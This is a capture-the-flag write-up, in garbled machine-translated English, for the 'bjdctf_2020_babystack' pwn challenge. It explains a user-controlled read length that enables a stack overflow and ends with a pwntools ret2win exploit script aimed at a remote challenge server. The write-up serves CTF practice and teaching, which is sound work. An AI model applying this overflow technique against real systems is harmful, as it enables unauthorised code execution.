bjdctf_ 2020_ babystack

bjdctf_2020_babystack

checksec once 64 Bit program Didn't open anything ,ida Look at the program

main function

What do you think read Function reads in 0 A string , Read a lonely ,scanf Also can not overflow , There seems to be no problem

however scanf Will read in a number entered by the user and assign it to nbytes , then read Will read nbytes Size characters , That is, we can overflow any length

backdoor function

Run this function to get shell

exp
ret To balance the stack Actually backdoor Function recurs +1 It's OK

from pwn import *

io = process("./bjdctf_2020_babystack")
io = remote("node4.buuoj.cn",29159)
elf = ELF("./bjdctf_2020_babystack")
context(log_level="debug",arch="amd64")
backdoor = elf.symbols["backdoor"]
ret = 0x0000000000400561

print backdoor

io.sendlineafter(b"Please input the length of your name:","100")


payload = "a"*16 + "b"*8 + p64(ret) + p64(backdoor)
payload = flat(["a"*16,"b"*8,ret,backdoor])

io.sendlineafter("What's u name?",payload)
io.interactive()